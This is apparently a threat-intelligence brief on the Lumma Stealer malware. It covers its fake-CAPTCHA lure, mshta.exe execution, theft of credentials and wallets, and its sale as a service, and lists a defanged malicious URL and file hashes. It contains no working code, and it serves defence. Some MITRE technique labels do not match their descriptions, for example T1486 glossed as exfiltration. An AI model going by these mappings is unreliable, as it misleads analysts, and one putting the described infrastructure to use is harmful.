This article discusses the Lumma Stealer malware, which utilizes fake CAPTCHA to spread and targets cryptocurrency wallets and two-factor authentication browser extensions. It operates on a Malware-as-a-Service model since August 2022, allowing anyone with financial resources to subscribe and access a command and control (C2) panel for monitoring infected computers. Affected: Lumma Stealer, CAPTCHA
Keypoints :
- Lumma Stealer malware spreads through fake CAPTCHA.
- Targets cryptocurrency wallets and 2FA browser extensions.
- Available as a Malware-as-a-Service since August 2022.
- Allows access to a command and control (C2) panel for monitoring.
- Uses deceptive methods to trick users into executing malware.
- Involves remote execution of malicious scripts via mshta.exe.
- Collects sensitive information such as login credentials and cryptocurrency keys.
- Promotes phishing through fake websites and malicious links.
- Recommends using antivirus and avoiding suspicious links or downloads.
MITRE Techniques :
- Execution (T1203): Uses mshta.exe to execute malicious HTML applications hosted on remote servers.
- Credential Dumping (T1003): Collects stored credentials from browsers and other applications.
- Data Encrypted for Impact (T1486): Exfiltrates sensitive data such as cryptocurrency wallet files and personal keys.
- Phishing (T1566): Utilizes fake websites to trick users into executing malicious scripts.
- Command and Control (T1071): Establishes communication with remote servers to receive commands and exfiltrate data.
Indicator of Compromise :
- [url] hxxp://5[.]253[.]59[.]210:7777/confirma1[.]com/Captcha
- [file name] Captcha
- [file hash] MD5: 55cc925d87797284145dbc82486769d0
- [file hash] SHA-1: fa843b0c5b3409e1f77ee10a2ec573d1fbd3d2e5
- [file hash] SHA-256: d41a963135b51adcdd95f5f00a92cebe99b3506a58a9e3947028a73f8f915690
- Check the article for all found IoCs.
Full Research: https://wezard4u.tistory.com/429377